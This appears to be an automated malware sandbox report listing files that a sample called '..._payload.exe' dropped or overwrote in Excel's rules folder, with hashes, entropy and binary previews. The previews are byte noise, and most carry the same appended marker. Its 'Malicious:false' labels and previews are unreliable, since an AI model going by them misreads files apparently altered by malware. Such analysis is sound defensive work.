                                                                                                                          Preview:<?xmlI.....^.5p.....%.@2.. ....K.>\.X).^..U..p.M...\&..W.8+......."7......?a.b.b..E....C.L........[...T......Rt..7...Q...$..+6.%..d..oe.$sJ..j..!b.....5..@.n.(x..?[L.sN9..h..0]8.ah..^/.J.....-.O.. .d..-......=.hB.q.K..~......X...$'U+...f.....(.2..LK.W..]1q.JV..#N...P.w/.@.7[Afd..VLUo(.......{.K..G,...g.k....L...g.v:.YxKf.>..1..nE..H...+.#Ae.D;.A..WXe..6\gz\..I?.[y......e..`....91.&u]O.a..%...8....QGQW{......F.y..<..ep/...3.[`he...17..k.I.H..7$z......5..F^.`..zUV...x%..q\......D..f..zv......lB.a,|IS..W.6.#....f.G.....y..f..p...\;,..yU-..j..r..5.D..n^j.b.*t..l......m..,m....b...n..5...3.f3X....q..@../..T....P^N.l.!\.f.\M}T..z.+..0...-..16..U_.PLN..qRZ.+.+t.|I..>.#9o.`e..7...8u.....=......H..v....|.k.?.Z.!...Hnd3p1$..Q%..i&..ip.lt....f...#.I<z.zD0...p8.So..P%.u..nu6.'...1.,.h...{.L...U...8....|._.y0.r&..D.V...J9p.`...Z7^<"..i...v..yVK.@#[.+E8.............lc_....R@....eD..C./`d...-nN....-O...N~.m._:..ky.,..D..C..P0+1.q.........,}L.u.U.T._.....?_X.phJtd

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324005v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):933
                                                                                                                          Entropy (8bit):7.751989702943885
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:K1ttkdfw78Ksj0R//1XUazMYWaKamGjQiqbD:Cki4qRYZaKeID
                                                                                                                          MD5:6DAEA152FE9315B8A7FB129CD7B2AA4E
                                                                                                                          SHA1:02C94DE562AC9E733958A1F3EE43BC15FB970821
                                                                                                                          SHA-256:9EDBB6D98BBE63C36B8D558D8202DB797B76DC0B08040FBAAA0DB0FDBC1E7DBD
                                                                                                                          SHA-512:37EF8697F855753FDDB6A7107736D6070B8B53909747ED184B4206687C8D908717AB549ABD6D892F61CA280D2B86AEE22EC22CA26C25192356F4987B3A134446
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?.......pf\...Z.L.H...".....]._...,Z'..#3.......s.B]<t}^..,...B......~........{...))......\|.u..#.H...2...6i....|T....../7.cT.?.Zo...b.*.Z...Y..).+..V.i}m..M..i.q.........n.P.Pa..b&..h..j.tw:t .;r........b..6k.O.,.6."..(.(...N..-...q.....d.,..*.S8.>.Q..*!.....>.v...! ....B..*..,..o.M-..n7."..-'9%.h.E....Do.<....p..#....-.%H..}.+...G9.....'....i3~H.?t.'....>.......C;...T.....S.+_..+z.....(....7.....2.K..f.r...M."..-.h.'..C..Wc.m.b.{F..x.......D.....=..1.h.n..C.......l...._lZRd.....^5......<."6y.i...FQsC...W..6........PG..*......#...T..>.!o...U.. g...>-.I..=.6....}.....c.L%.}>.h..{..~-`hx;.u..!.....*..y.mb...t.}o....h..P...iF9HS!.....@...w.M#S.....;.....>....9f".b5...INK.\.....R..6..d+.......,]...qP..Q..A:..{...@b....i...{..W.a|...LX|~nC.[..........4.........%..P!mG..0.....Y....^.;.}.rW^phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324006v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):933
                                                                                                                          Entropy (8bit):7.748657634508047
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:sdqwJihtSPJSFS7jRJ3aTbl90vK/sqfWAUze6HZfTT42v6X9nEg9WK1YhIoPNJtU:g52SBScfRJAusGz3HZLT56Xl95YioYbD
                                                                                                                          MD5:B42D394F70F6BC94349945E23FE0FB29
                                                                                                                          SHA1:D5AE49B558E40ED4857A54A38D5B54DCEAE6426C
                                                                                                                          SHA-256:D24D52F948FDE39C32F2799A9F55D11B05D059FD2B3C9DAF024236B0D6427D90
                                                                                                                          SHA-512:310D385BBECC44DDF218597EC1CC3DCBA1AE2CE9A4844EC6B51620242ABE77F9BE292CD7B3BD348953D72AA1D9A6697D3C7435DB7F8F6D802856971F02358DB8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.0Bf...y.m..(?..4.....>J.......L.Z.0....DB...a.W~C.5c..d .R.kS..k.=..!t..2...TF......{.u.W....b..P..Y .....y..b..-.-.%.......t.2`F....p.;xp..A...yE....I..H.o.5.'&....D`....bb..CP...s.o....R.5wZ..vI.N3."..%...[...tp..^f...m../R....f.. ?..E...rY..m..U[...".......DWo.*=.v1..X....$..+...H?|.p..4.g.t2H3.ap....~.5.%("...;*..X.A@.=....*._....l:...1.T1d.T...L...`.....9......R.$..p.< |...weh...M..L%.i.v.....7...QGP#.U3Y.6.......h...|B..z........w.sE<........-.Z.A......C....cBg%F.P-....9......).TS`e...S......'a..".Qp.....+h....[.8^.....E...^.B.~.34.q6.. .%..eVT......:....1P.I.Q.DJ.........f.~@.W.LB.?...m........N.(...*W-...Ww=kK.H.........%..oe.%@.=0....S..E..Y~..m..T{.h^7[.s..r.M........I..{IX.. .b.w.,s..@.)a....e*>..MzJ.....8C.....<.T....m..Q..Dx3<.....!.$......zI...W'..|..:.e..,.;..s.L......>.OI(phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324007v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):945
                                                                                                                          Entropy (8bit):7.742885617355065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YTvJz0X/nqn1MU41v5OfNJl4aHfpwRCJVnvwYoQbD:Evln1OalHfpf3viKD
                                                                                                                          MD5:33A334F11F02B83A9A5354019F77F71E
                                                                                                                          SHA1:CE2182A3BDBF663846ACBC1B161065E656799296
                                                                                                                          SHA-256:821526F1AC96AE6C7D6197E320699C1CAA1EDFEB46C9BF06461906AF61C1938C
                                                                                                                          SHA-512:734B3C83A244CEE69FA226C43436DF15CB60332B29B707303951DF38BA9717DEAC8DC325588867AE37E16BBA67DB2B1760907EC4642C7B7143691807F24C73D9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmle....NK78.J....NCDi..e.. ..Jco d..L....[.P.(/4......O...C;......ZiV....Vr;.....t.?..A.. .<.dH.#}Q[.Z.P&Ya..xpR.}.t.Py..v..bD..N.9.. .... W.......r{.pD.W.....r....J..b..M.>.t.....(...Q[.Zx^......m.9.C=\B.6.*6.a.u#........u-..!I..v..^r.B^...8../.T...i.,..t....Q.NH......6z...ok.......,s\.X._n..~y.Zzc...{......*,.".7.|.x....NQ..vgt.W..8.]....UT..a....,..\.+...<...{...U..@.._....7..<.iAc...u.....*.Gs/'@..n.m...JI......T..t6<T..M.....R......KK.R..G.KM..,..#.f.0^......B*iK...R......^M.....+..|..........X.Q....t{,.[.h~+.m.Zz.d!s.q...q.g .v..xN.*.jE...a.KT>.k..6T...d+~T...\w\Vg,..1...z......6D^.....qV....;....+9...,1......M .,..,..._.......xY..6 k...+'..|...l....../.&>.T...{....Rq.c.....Y.&.<rt.`.....6..U.7.!.....gA....t.`.{eRa.q<..v..Y.vD (...$!/d...~.W..C.O.u.o..8J...y>...[;.....H&....n*f...*<.P.........*..J.....(phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324008v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):941
                                                                                                                          Entropy (8bit):7.724320178146931
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:USg2SlMnBmMklF6k7QPQ/j6qr/HiF95QLmoL0PqgzwbD:USgP8BzkWWBLW95QKI34qD
                                                                                                                          MD5:49A36BCE336D201E48D68BA99A989BA7
                                                                                                                          SHA1:09C9C735585BE378ED6C0093CC1E971ED9B97DDC
                                                                                                                          SHA-256:EACADBA6205CF054EC63D4EFEACA1AB52EAA9EA055D318CE0A056E7DCDBAD5A1
                                                                                                                          SHA-512:085B7EE5D8DDE48616EAB39DBF32C067731A513277B70F63ACD02ACA6ECD6C6BB07013A645BB2090BDD2B5246E4B7FF154587541579458C52C435603808C6C8B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....5..m..Ti.m,.......T.~J..e......X_TM..;.~.,.:..B>6Ss..h.... ..5X...>.Z.vyO1;.I7J.#XZ6.....nMX).1...)..fV8. .l...T.jhn.@....Zy2J..f.....T.D1".v..%...z9...YQ0..i...#...Y....jG.-..f.'..'.Vw.6....zMA.....2k.006.......=}..:#.(..- %.X.!..,p......U.y..(-...@#..6.@(j.F&.}.x...G..`o..~".cT.+..mB.....BJ...*...h...+".-Z.U".."X...f...G.....D.H..C.H../...4.,e.......v.....1..Lv....BpE.d.N.rw.p.......d^.N.....G....5.(....../...`[E..o...Q{y7.K\7Rd!.J..l...!.. .T..=..c.../D.I.~.x.&..@.. .....L;G.7.6.O....fp........W.<.B-........pt.V..v..z6Uk.<.....xQx.Z.*......u`........z4.."Z. .~...}..d...2.\\.!Kd..rz.pz..Q.&..(s....t.....E*....[iCQ!K!1.>..j..q..&.F."..4...Vl.'........rm.k.y..DdI).w._.w..'...M;.jF....e]...+.M:F.....~..j..%S.I}^.a..3..e.H...:j.^{u|X...F;...!..CDO..g...Q'...%YT.'~F.."J.......W......8.......*.H....X.~'L.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324009v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):945
                                                                                                                          Entropy (8bit):7.754240109739145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gW8tCno8riwpZt4sxMgFlIoKs8iMCeMNzvwCzWbD:gWLfT3ecflwCzED
                                                                                                                          MD5:A6B81F0471C39533D1393E14E725551E
                                                                                                                          SHA1:EC6CF7529C6A9CE5B4A3ED170D2EE9BEAF62DEFE
                                                                                                                          SHA-256:7E053C1A4684BDBA6DFA8A177A9C35347D861DEBFE42493225CFA21A6D48E609
                                                                                                                          SHA-512:EF40783087AA2527D68AA9BFD0BEFB2E50E96F0FB06DB47F96F912BC152CD511C57BA7696BDB30B7B03BAD366865364B2BFF43C3BFED8FAFE1EA6E13CE13338A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml]o..;t.F...e...H.y..i.J..S..w.....m..)?.{/...PmU'..~.RE...Wrg..HU..K#.Ubl.[..<.".l"1..Mrp{.d..63....&.p%+Z.?..O.:.!.4.0..hJ.9U.ryg..G..w....L5.O:....'..*g.../Q.;.$(.?..s....:..UN.B..'u......7T.k<2...._....Vn1qu..=O.-m.C..Fo.C.}'..S.O.T@.Q....\j_.y..X..N..W..Hf..y9L.E.5...fi(.`..vk..7k...._.L].3.......0=,79x...B.!&BS.y2..l..q.-.p4.r.g.p..e..w.-t.c..W}.c....LzA..FPD...lv.j.v.8l?.t.,....3...h.<-.Z./.....$O].P.,UV.E....?6.U.e.{2.m.M.R.M.'...kZ,..`<+...|.U..L.b[.Y..O.21.....UT..a.R..-.Kz..........N...BM.....(5C.@....../7TF..i..J.q...K..xd...+&v(9..b..).....3/.ACy.2.[|ab.ga.l..`.....5yH/... !...;.....4.oC...G^.#E.%._..sr4.9.f...h.q.F.t..p......Q4...B..p.^..w.3*.R._.O........ .tI3..[.7^.....f.h......h.e@.S.:..b...$..xB.Z..b.3..?.h..8...<Z....p.........u......*aD@.....G.0.r..r]@........&...b...u..j.V._._).i].F.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324010v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):945
                                                                                                                          Entropy (8bit):7.7968179342507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:6D7mL+E2RqDxdFMngtFfuSGebGs02c5bD:RL+E2R2xdeWFfuSRbGs0J5D
                                                                                                                          MD5:7B95CF80437D57517E5BEB748EF5FAD0
                                                                                                                          SHA1:6FB763535A8D18B5358FB710323CD16C95F58CD7
                                                                                                                          SHA-256:CE8DA1CE1A742F573DE2E64E4B073B1C771CB91237B82ACCD8B49099D72BF078
                                                                                                                          SHA-512:A944BF3C176E2E402216D3805066C521F4AF544588F2EB57802C262D5FEE54013DFF4EF5C318066235EB76128B8DA92F7C4542F67EFCBC5F8954A0BAF09CA5B9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlaf"..g...M...".q...[.{...8.Lz..-.n.gGF.....j}...`.nK.,..r. ...."..a.u.....'..G..Y..L.6....-._[.`@~c.C,+.).....q.bk....MPC.F_.9.Z...Y.]7.X..z...0....]....r...P.5..m.[...I....3L.d..c..r.._..v.oju..!....`.".$D.......c8MxI.$..F<.......5..[.N..Ul.....;.;<...b.}...9Een..}.._......5U.:.S......V..t.Ez..S...f.....%.O*....&3.w=0..[...3..y#.x.....>....vO....xeM.. 3.h.g..8...27.......8u\....6....w...SE<....|.2#..4.._9a....*Ye..i4k...;...._k.$.-)C.xs n.hN.:.S."..|.....*7...TO..V.........6._......IhV.;qS.Xy.X..s+@..........v.c.mZ3bv......Yr.!...'.~.$.-... ..k0...>H..ig..D.....2.gp......:....`A..[.c...i..4U=...()....H9..f.]..V..M..%.$.i...@....v.W...-.e..j].yJ.R.....?rD.H.R....&..[*.3m.5P{..J./.e.Z...1(..K{.X..6.n..65i....F.I&..dKS5..M.C&.]2?.p...$....J.l.......k.......V......... |....k...K.Xl-l.B....~."cE{P..AX&........phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324011v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1000
                                                                                                                          Entropy (8bit):7.812639643113513
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:sSp388Xlhn+oha6ZZpgNkb0PTvnFMEGshQpc+IyLiqbD:sm3zl5+8pZpGTnFMCqiID
                                                                                                                          MD5:45BF8C3CCCBA3972BF01FF7DDC8A7245
                                                                                                                          SHA1:1DA96535C58B361CD9731B01DD0B1FD12E11ABC6
                                                                                                                          SHA-256:C0B9475C4F5666BB6FD2675EE64D2F5D6C71FCAE3DA6C0C758D6D2237A5A1049
                                                                                                                          SHA-512:8E28BFBC12ED13611E2931DEBC4B322864B76F2B9F329778073FFD9AE33DD1389EEB16AD24377C903A0E4756143628CDB50129448AE62ECB8EBCA81B41C8EBF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.By.4<.......#w_e..%2.......-....bL.GCIQdj3<[.[..aE.0;...W.3....s.......#.$.\...........$ugE.j.?.......K..=:I...Pp.[m)...<..y9Y..[h(.O.@!F.....B....o.R..L.*.xq....H(......x....#i..U6T....... .3Z..v..I.B!m...a....<9M..]UDO?j"...PQ8....y.!l...+.}..s.Ia.G..a....Y]..;B.......).K)k|AE.|.K.......\..C...6.Z.)....rK......4*.h.....0......?..y..c.....6..Qg....(.....1.;...WV....$L..)......3n5).k...5.Q.rU.>..._...v.4....;."...O{.w,...r...4..t..m..?..+...l'..<)......,$A':QG#....hp......jb...)YW>...*>....E;.7.:.2....r.....L..*.....eA.Rl.[!y...(R7&.;..O.K....-...B.....P+.;C.f.-d...GR.....|`j..e..C......{......?..... .s.VlV...%..F.9.;.......<.L.`.J..`..y.......3:.F..h.&...=...O.D....}..l.>]9..S...c1q[...?oD..$.yj..0.c).g...../...h6r.}].R..R4W.n....l..g....{........|:.X.....)..o.%.r.O"....-...e.....W.L.VHX.......~4..&.s..&...:[..<.RH..\.......&"#.m..}.<..,~..(.j3_>.a...B.m.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324012v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1498
                                                                                                                          Entropy (8bit):7.871436770244832
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:19Gij8W6RDGZHfxCHC7AzoV0TR4qD9DvBCII61pbhpCMh6QMvt3k3oR0FhMBiXWL:/GRDGZ/kH4WoiR4qDjCIX1p1Y0mV82wI
                                                                                                                          MD5:AD81A11A28570919AF93A7721794DBE1
                                                                                                                          SHA1:F4DF2C58385C5503BE01B1D951CD884C38F8EAF3
                                                                                                                          SHA-256:5724B273A54EB37506A5E34A05D956ED8AD00B176E18E8FE9994C406E055D283
                                                                                                                          SHA-512:4F1229A61E39F12A0A3EED57F2E6F1F34020D937241E349F30FE10BA581AC325F45D810D922A6E04726984D677B4F5D103F45D211C3D2081F9A5CBBC26D0419A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlg.m...1m.3.......B.CE.....F.+...*....#.Q9.d..p....M.-.@q.:..).".....w...U.....P......5.$....).'H...t.)6\..S....5.L.$.....T.......U.u.c..N.>KI.+.+....4.T!.........J.;U...j.^4xRw...P9.Ux....?....U`..$....Zk...pPD}@/...h...<.[.4..;_N....]....P......p[....-...P@E.|.Z...<~.,..n..sP.)6-p.q.\lb.....&_..pY..L..9...9.<.._..BC.].C...Q./.Kz.>....-.M......}.).h.)I..*x%. .Q..#%...%..........U.ro.AC.O.oz.L.>u...yaJZ(.B.r{+*}.q....Qww....@.....N..N..\..Su.k.&R%..c.....O}.a.F.....P..j.t=.O...!sM."B....tPEQ..3..0.f.....p._..KG....57..>...dDQlEZ.-}.X4''W...zi.M.H.\...p.....d.!..Z......6....)h..T[n..V0e~...)..m.--~.67.&...K..."....{..3$W..#.4V.h....i..n.UD;............. ..Y1...+IIT..#+...o.?...........0.}2L.3........2z..).k..........KY'...do....>X......y.$.d~.M"....M....l|.....O.CHy.a....!.y...R.$...[..#.J/..W1.?S..Y...&..rQ..;&.o.D..3..H]....=9J..x..w...j.h....O<....J..].........=;.~d...6..bT.C...(d./.....?.....`......G.t.y.....I...)......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324013v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1357
                                                                                                                          Entropy (8bit):7.848306974460634
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Ru8eg2GBOiw2zrbtlxXMMLlIRrjBHwO75toxJdHX8l8TbNuWSlrDF92FfbSzbD:M8b22LHplxcMLlI1BQIoxJlX8aTbwxYw
                                                                                                                          MD5:A81308A3FDD968B6E373AB204BFAA264
                                                                                                                          SHA1:FD2A61CCCECB5990F9DBC9C562D84CA16FB7CBC2
                                                                                                                          SHA-256:B513B08867EB20C3E8EB6749E20D40D18568DB2A291E87B8D62BDB160D5A7161
                                                                                                                          SHA-512:667E86E1B6027A43E3D1C96FB493304937D3CC8B22B44FEA66BF63FA7D0F226FF1BBC8FAF4370A6FC9EF800E3B68782597DC1D6272EABC8C15D4FB12D5111908
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml`..m..$.....B.c.aa..!?.1{.Mn0SG..z.v...5'...py5.B5j...m....I..i^..p2....K#...xZ......3.]L.d@...C.[..z............%j......B..o..X?U..Wi.a:..wz.c......E\j.F.....${...w..&..............%:...f...........s..F....#]+._..$....%....UD.....M.O..S......LWJ.6._.h....vr./.&.a..V.8J8.6......A.T....|.4>S...."...Fx........#.d..r[v.#T.(.JB......H...n.U.n.F.{.v....p.|;.'/W.uS#.&.}..%. BE....:%...8..J...j./..a...}zJ..>{a....H-~......5....74y.A.._X6..wP<z%*4Q..:.+[&,.+.`....?.3...<.".h..h:i.p.i...c.....2[...f.7..e..6W...%..1...G...X.O..=..k..#.@4..ix.M.....U. .7.\=S.TgEWF..S%..H.@.Y"...../..J...F.Q....>+..E1.....L.`.a.....K.x...p..HT...6..6B...u.......I&.AuS.~^p.c~.;..]..1...u.D.j..s..I+G.>..|....h....3~.X..GW.l.....[O.=.\!.d.NusW.D1...*&.8.~...\*C.&....b~..1...7H.I....k5~..Mf.....Y.......I9.Bo..a.%..!....[..e..?.J.W...cl&G..)......|..u.......B^/.R.)^..u..MC..%....!.......B........Z..'.C>. Efi;D..SR.........T..+....R..f....%L...,.|c2[Ma6..S..t..E....G...2...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324014v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1049
                                                                                                                          Entropy (8bit):7.832212966005775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:bPbCd/NNd1jMZpS1luxHo+dWvAI56hVodBJk9LYoVfgbD:bPbmNN3yS1IDdWvrmsBG9LH6D
                                                                                                                          MD5:CC75891C2FF6BC98661DB07C1B55CB4E
                                                                                                                          SHA1:AE5FF9E14AE46DF5C313C391E6FCA3F65CB873B1
                                                                                                                          SHA-256:4DB0FBB4B5F17E2035FDEEA273F21B873E20E65F48B4A17D8858AFA66C8B204F
                                                                                                                          SHA-512:D34DCE72EF4234C7B2B82AA01DCA55EC1DC7A1BA38007B05BB18B393E05C68F597BDB27535E3EC3672922DC1CD6AE419454BEDA94A4D2AF2F376914E1C9946DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.._.e..dL....#..:s..8.8.....f;....w....A......o..]z.....u.....-..@v...*>.|....;.....?.a3 K3...+rx...y}.r$-.......a@.Z.8}C....'J ...ak...@.w.t....I..ui6Vh..I`]..y./;#Tc~[I.N7P..}#!..?S........8..L.W..^.W.B...`.k=`.P....<a..,(.......B~..%E)..0.....?.W.|....P\.....%...U....|_.....a.%.2..n.M..F5..S.n....6.a.e.f.!..[.z.Ir.X~.a......P.....h.G..j......c.Y.4..V....I.*....U.....K...."-..q8&......(..9...S._C.'..m.....).L.........E....v..l.(!5Db...i.*.....hQA.S..T..W@"{.....A.....(..a.....s..p2....Z&.......U....$...m....U..g.-....L..dQ}=V.r"N.[...2o........?........K.............^.......-...1`(...+X*..0..K..z.v#..V..n.<Q.#4....*.......=.QV.<..'Q..T1......9.....,....U[zP.d...F..=a.......b..?......R..6yPp./..lvT.-L.k...!.kb.H.@.&.X.Rv.XP..#1..npX.u.dd.h.h1..W...At..i..........8>{B....O.c..;92.c..w..y.........D...~.......4..f3... ....S. #2.R.."rA..x.[....$..(.0-..8#...hy..2y.......'.ca.?.@.X..y./.lh>........P;.uP..Y.K.n...phJtdHo970vyx7vwlYG00OakDR75R

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324015v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1184
                                                                                                                          Entropy (8bit):7.81549808180568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:F41OMUbIKx1C7N74GtkIGUaFbX0FVAr00kjeEjXurftz/jbD:FKOMUbIK1CprkIAN0f/scXubJvD
                                                                                                                          MD5:CE3095B15AB827D3375266F73C4F2E7A
                                                                                                                          SHA1:E7D5AA82F97AD802215676E4F74DA469819B46E4
                                                                                                                          SHA-256:7A78C0825583CD6FF5A2DD06EC09CB13E0A76C2EC0EA3AE0CBADBA1026498E2F
                                                                                                                          SHA-512:8980F430AAF77F753B12A08A80AA5B4233B79ABA1F84FBB69E5549A6A38E777439F82189C9746AE08188B9D47B7E083EE0F657AE6F634ECFD730B9435755B411
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml7..h2g..W....z.x."...7..Q..4..1A'..T..Q}.1..@C...:...t..Od^.J.a...).@.'w...+..<.s1Z....E'....D:...5..r.......w.W...Z.-[..a.,6..g...G$9zj.Eqy..;.. 6w.7.=.R#Z...[...*..|....Ts=...7..........4.....L;....v.....TI...x.L..!.ZC.;V...2.,.......:.d..."...:H....ux.A<.)T....6.sK:...N.x.+.a.....@X|.=.T....nS.9.[....u,D....S.?............/......z...=...|o l.\.!...t...h.cB..b....Y.....s....3.4K.S.S.My:..1v64}./....7m.......,(:Z5.=fl.,.l..ek...%|:%7-w~i..<f..|.W.a..>...M.)R+.8_[)T..{.V.+...oe.g~.z..N,.O...gU..uI{7........1?...?..+...1.[.9...t^.k..1.I..;.69.._...ed..C.E]...........1.H9aJ....3..Q"........E.oq,;..Xv.......V...s..`..B;.8. R...Z..4EV.....;..>....H......V.U,.|6<%g9.$...b.t,.z..mMo.#FD3.K(.u;..J....0...@....S....D6f....]...m9..T.1>X}.....i..?`.w....md..N..<z...].#......Me.~;.....u>...q.g.....Ts8...o...~x...'f.@z.,....N...K..."..v...;.kI.{.{E.Z..p2.ZEP:....O4..{.....[..=@"O...$...7...?6.L.5....p. ..Z........4..+...*.P...Ei..XX..1.H.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule325000v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9303
                                                                                                                          Entropy (8bit):7.979924714283704
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:TRTFf09yk+jBHjCt6qJbtaBcXskj5IduQMGI1pO1VRNRmbQ:9pf09ydMtbHds/AQMGI1GVRbmE
                                                                                                                          MD5:EA12CFF8A8C6175C4BF0B8AB944C8826
                                                                                                                          SHA1:B80A8B25C1600B6217EA331DACA391D85BFCBAF5
                                                                                                                          SHA-256:EBFE937C69D0F3B5CFFD4DB5A0A9747E5C941A6C502E0539D39EAC65E2A8BDA9
                                                                                                                          SHA-512:A9D484224627D3033BB02BC7A0D164CF8514B3E793BAEBF083C8F82BB7792A0C1F736E55015D45A0BB5F8E78DE0BE0DB081BE7E908BE4FFC818D69333A8FDAD3
                                                                                                                          Malicious:false
